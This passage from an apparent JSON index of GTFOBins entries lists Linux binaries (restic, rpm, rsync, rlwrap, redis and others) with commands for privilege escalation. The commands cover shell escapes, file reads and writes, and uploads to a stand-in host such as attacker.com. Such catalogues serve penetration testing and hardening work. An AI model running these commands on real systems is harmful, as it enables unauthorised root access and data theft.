Escalation"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rc/"]},{"id":"gtfo:rc:shell:0:unprivileged","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rc/"]},{"id":"gtfo:readelf:file-read:0:sudo","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/readelf/"]},{"id":"gtfo:readelf:file-read:0:suid","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/readelf/"]},{"id":"gtfo:readelf:file-read:0:unprivileged","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/readelf/"]},{"id":"gtfo:redcarpet:file-read:0:sudo","toolId":"gtfo:redcarpet","toolName":"redcarpet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"redcarpet /path/to/input-file","description":"The file is actually parsed as a Markdown file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/redcarpet/"]},{"id":"gtfo:redcarpet:file-read:0:unprivileged","toolId":"gtfo:redcarpet","toolName":"redcarpet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"redcarpet /path/to/input-file","description":"The file is actually parsed as a Markdown file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/redcarpet/"]},{"id":"gtfo:redis:file-write:0:sudo","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/redis/"]},{"id":"gtfo:redis:file-write:0:suid","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/redis/"]},{"id":"gtfo:redis:file-write:0:unprivileged","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/redis/"]},{"id":"gtfo:restic:command:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:1:sudo","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:1:suid","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:command:1:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -p -c \"/bin/sh -p 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:1:sudo","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:1:suid","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -p -c \"/bin/sh -p 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:1:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:upload:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:upload:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:upload:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:rev:file-read:0:sudo","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rev/"]},{"id":"gtfo:rev:file-read:0:suid","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rev/"]},{"id":"gtfo:rev:file-read:0:unprivileged","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rev/"]},{"id":"gtfo:rlogin:upload:0:sudo","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlogin/"]},{"id":"gtfo:rlogin:upload:0:suid","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlogin/"]},{"id":"gtfo:rlogin:upload:0:unprivileged","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlogin/"]},{"id":"gtfo:rlwrap:file-write:0:sudo","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:file-write:0:suid","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:file-write:0:unprivileged","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:shell:0:sudo","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:shell:0:suid","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:shell:0:unprivileged","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rpm:command:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"rpm -ivh x-1.0-1.noarch.rpm","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:inherit:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:inherit:0:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:inherit:0:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:0:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:0:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:1:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:1:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:1:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpmdb:inherit:0:sudo","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:inherit:0:suid","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:inherit:0:unprivileged","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:shell:0:sudo","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:shell:0:suid","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:shell:0:unprivileged","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmquery:inherit:0:sudo","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:inherit:0:suid","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:inherit:0:unprivileged","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:shell:0:sudo","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:shell:0:suid","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:shell:0:unprivileged","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmverify:inherit:0:sudo","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:inherit:0:suid","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:inherit:0:unprivileged","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:shell:0:sudo","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:shell:0:suid","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:shell:0:unprivileged","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rsync:shell:0:sudo","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rsync/"]},{"id":"gtfo:rsync:shell:0:suid","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -p -c \"/bin/sh -p 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rsync/"]},{"id":"gtfo:rsync:shell:0:unprivileged","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rsync/"]},{"id":"gtfo:rsyslogd:command:0:sudo","toolId":"gtfo:rsyslogd","toolName":"rsyslogd","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-file <<EOF\nmodule(load=\"imuxsock\")\n:msg, contains, \"somerandomstring\" ^/path/to/command\nEOF\n\nrsyslogd -f /path/to/temp-file","description":"In order for this to work, one must be able to trigger one event containing the chosen string, e.g., `somerandomstring`. One possibility is to attempt to connect to the victim host via SSH, for example:\n\n```\nssh somerandomstring@victim.com\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rsyslogd/"]},{"id":"gtfo:rtorrent:shell:0:sudo","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-c,\"/bin/sh </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rtorrent/"]},{"id":"gtfo:rtorrent:shell:0:suid","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege 